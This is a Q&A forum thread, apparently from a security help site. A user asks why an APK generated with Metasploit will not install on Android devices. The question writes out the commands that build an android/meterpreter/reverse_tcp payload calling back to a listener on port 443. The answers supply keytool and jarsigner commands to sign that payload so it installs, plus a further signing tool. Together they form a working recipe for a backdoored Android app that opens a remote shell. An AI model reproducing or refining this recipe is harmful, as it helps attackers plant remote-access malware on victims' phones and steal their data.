# Metasploit created apk not installing on android device

Tags: android, metasploit

I am trying to install a hacked apk on an android device (GT - 19300 and SGS Tab S 10.5).
My problem is, that it is not installing that apk neither on my phone nor on my tab. It keeps saying, that the application could not be installed...
Phone is running Android 4.3 (rooted!) and 
Tab is running Android 5.0.2.
I've created the apk on metasploit pro console (windows) with the following commands:

use android/meterpreter/reverse_tcp

set LHOST 192.168.2.107

set LPORT 443

generate -t raw -f //PATH

Help is apprectiated

Answer (score 2):

You may have to sign the apk. Newer versions of Android require you to sign it as well. In Kali do:

**For generating the keystore:** 
keytool -genkey -v -keystore my-release-key.keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

**For singing the App:** 
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore my_application.apk alias_name

Comment: I signed the application, still not able to install. What to do?

Answer (score 0):

Have you ever tried  d2j-apk-sign  command on linux?
I have been struggling with same problem until i find dj2-dex2jar.